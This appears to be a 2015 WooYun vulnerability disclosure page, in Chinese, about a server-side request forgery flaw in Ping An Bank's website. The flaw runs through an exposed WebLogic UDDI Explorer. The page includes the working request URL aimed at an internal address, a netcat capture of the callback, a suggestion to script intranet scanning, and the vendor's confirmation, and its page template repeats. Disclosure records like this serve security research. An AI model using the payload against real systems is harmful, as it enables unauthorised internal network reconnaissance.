平安银行主站SSRF漏洞（可扫描整个内网）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0137796

漏洞标题：平安银行主站SSRF漏洞（可扫描整个内网）

漏洞作者：猪猪侠

提交时间：2015-08-29 12:23

修复时间：2015-10-16 15:22

公开时间：2015-10-16 15:22

漏洞类型：应用配置错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-29：细节已通知厂商并且等待厂商处理中
2015-09-01：厂商已经确认，细节仅向厂商公开
2015-09-11：细节向核心白帽子及相关领域专家公开
2015-09-21：细节向普通白帽子公开
2015-10-01：细节向实习白帽子公开
2015-10-16：细节向公众公开

简要描述：

平安银行主站SSRF漏洞（可扫描整个内网）

详细说明：

UDDI Explorer 对外开放

http://bank.pingan.com/uddiexplorer/
BEA Weblogic Server 8.1.5.0          
UDDI Explorer

接口可连接外网，把baidu.com换成内网地址，写成自动化脚本就OK了

http://bank.pingan.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://baidu.com&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

漏洞证明：

监听80端口，直接访问了过来
http://bank.pingan.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.8.11.221&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

[root@10-8-11-221 ~]# nc -l 80
POST / HTTP/1.0
Content-Type: text/xml; charset=UTF-8
soapAction: ""
User-Agent: Java1.4.2_15
Host: 10.8.11.221
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: Keep-Alive
Content-Length: 403
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><env:Envelope xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><env:Body><find_business generic="2.0" xmlns="urn:uddi-org:api_v2"><name>%</name></find_business></env:Body></env:Envelope>

遍历内部系统，XSS获取的信息，paic在内网

http://netsv2-itstmr.paic.com.cn/netsv2-itstmr/main.do

修复方案：

没必要对外网开放

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2015-09-01 15:21

厂商回复：

谢谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0137796

漏洞标题：平安银行主站SSRF漏洞（可扫描整个内网）

相关厂商：平安银行

漏洞作者：猪猪侠

提交时间：2015-08-29 12:23

修复时间：2015-10-16 15:22

公开时间：2015-10-16 15:22

漏洞类型：应用配置错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0137796

漏洞标题：平安银行主站SSRF漏洞（可扫描整个内网）

相关厂商：平安银行

漏洞作者： 猪猪侠

提交时间：2015-08-29 12:23

修复时间：2015-10-16 15:22

公开时间：2015-10-16 15:22

漏洞类型：应用配置错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0137796"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：猪猪侠

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源猪猪侠@乌云